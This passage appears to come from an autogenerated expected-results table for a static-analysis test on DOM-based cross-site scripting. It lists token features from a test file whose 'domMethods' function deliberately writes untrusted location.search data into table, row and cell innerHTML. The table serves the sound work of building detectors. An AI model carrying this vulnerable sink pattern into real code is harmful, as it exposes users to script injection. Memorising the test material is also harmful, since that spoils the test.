contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:463:21:463:26 | source | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/tst.js:463:21:463:26 | source | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | | autogenerated/Xss/DomBasedXss/tst.js:463:21:463:26 | source | enclosingFunctionName | domMethods | | autogenerated/Xss/DomBasedXss/tst.js:463:21:463:26 | source | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:464:7:464:9 | row | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:464:7:464:9 | row | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:464:7:464:9 | row | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:464:7:464:9 | row | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:464:7:464:9 | row | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:464:7:464:31 | row | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:464:7:464:31 | row | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:464:7:464:31 | row | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:464:7:464:31 | row | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:464:7:464:31 | row | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:464:7:464:31 | row = t ... Row(-1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:464:7:464:31 | row = t ... Row(-1) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:464:7:464:31 | row = t ... Row(-1) | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:464:7:464:31 | row = t ... Row(-1) | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:464:7:464:31 | row = t ... Row(-1) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:464:13:464:17 | table | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:464:13:464:17 | table | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:464:13:464:17 | table | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:464:13:464:17 | table | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:464:13:464:17 | table | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:464:13:464:27 | table.insertRow | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:464:13:464:27 | table.insertRow | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:464:13:464:27 | table.insertRow | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:464:13:464:27 | table.insertRow | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:464:13:464:27 | table.insertRow | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:464:13:464:31 | exceptional return of table.insertRow(-1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:464:13:464:31 | exceptional return of table.insertRow(-1) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:464:13:464:31 | exceptional return of table.insertRow(-1) | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:464:13:464:31 | exceptional return of table.insertRow(-1) | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:464:13:464:31 | exceptional return of table.insertRow(-1) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:464:13:464:31 | table.insertRow(-1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:464:13:464:31 | table.insertRow(-1) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:464:13:464:31 | table.insertRow(-1) | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:464:13:464:31 | table.insertRow(-1) | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:464:13:464:31 | table.insertRow(-1) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:464:19:464:27 | insertRow | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:464:19:464:27 | insertRow | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:464:19:464:27 | insertRow | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:464:19:464:27 | insertRow | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:464:19:464:27 | insertRow | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:464:29:464:30 | -1 | CalleeFlexibleAccessPath | table.insertRow | | autogenerated/Xss/DomBasedXss/tst.js:464:29:464:30 | -1 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:464:29:464:30 | -1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17766,18 +123344,189 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:464:29:464:30 | -1 | enclosingFunctionName | domMethods | | autogenerated/Xss/DomBasedXss/tst.js:464:29:464:30 | -1 | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:464:29:464:30 | -1 | receiverName | table | +| autogenerated/Xss/DomBasedXss/tst.js:464:30:464:30 | 1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:464:30:464:30 | 1 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:464:30:464:30 | 1 | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:464:30:464:30 | 1 | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:464:30:464:30 | 1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:465:3:465:5 | row | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:465:3:465:5 | row | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:465:3:465:5 | row | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:465:3:465:5 | row | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:465:3:465:5 | row | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:465:3:465:15 | row.innerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:465:3:465:15 | row.innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:465:3:465:15 | row.innerHTML | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:465:3:465:15 | row.innerHTML | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:465:3:465:15 | row.innerHTML | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:465:3:465:24 | row.inn ... source | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:465:3:465:24 | row.inn ... source | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:465:3:465:24 | row.inn ... source | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:465:3:465:24 | row.inn ... source | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:465:3:465:24 | row.inn ... source | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:465:7:465:15 | innerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:465:7:465:15 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:465:7:465:15 | innerHTML | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:465:7:465:15 | innerHTML | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:465:7:465:15 | innerHTML | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:465:19:465:24 | source | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/tst.js:465:19:465:24 | source | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:465:19:465:24 | source | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/tst.js:465:19:465:24 | source | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | | autogenerated/Xss/DomBasedXss/tst.js:465:19:465:24 | source | enclosingFunctionName | domMethods | | autogenerated/Xss/DomBasedXss/tst.js:465:19:465:24 | source | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:466:7:466:10 | cell | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:466:7:466:10 | cell | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:466:7:466:10 | cell | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:466:7:466:10 | cell | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:466:7:466:10 | cell | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:466:7:466:29 | cell | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:466:7:466:29 | cell | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:466:7:466:29 | cell | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:466:7:466:29 | cell | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:466:7:466:29 | cell | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:466:7:466:29 | cell = ... tCell() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:466:7:466:29 | cell = ... tCell() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:466:7:466:29 | cell = ... tCell() | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:466:7:466:29 | cell = ... tCell() | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:466:7:466:29 | cell = ... tCell() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:466:14:466:16 | row | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:466:14:466:16 | row | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:466:14:466:16 | row | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:466:14:466:16 | row | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:466:14:466:16 | row | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:466:14:466:27 | row.insertCell | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:466:14:466:27 | row.insertCell | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:466:14:466:27 | row.insertCell | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:466:14:466:27 | row.insertCell | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:466:14:466:27 | row.insertCell | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:466:14:466:29 | exceptional return of row.insertCell() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:466:14:466:29 | exceptional return of row.insertCell() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:466:14:466:29 | exceptional return of row.insertCell() | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:466:14:466:29 | exceptional return of row.insertCell() | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:466:14:466:29 | exceptional return of row.insertCell() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:466:14:466:29 | row.insertCell() | contextFunctionInterfaces | 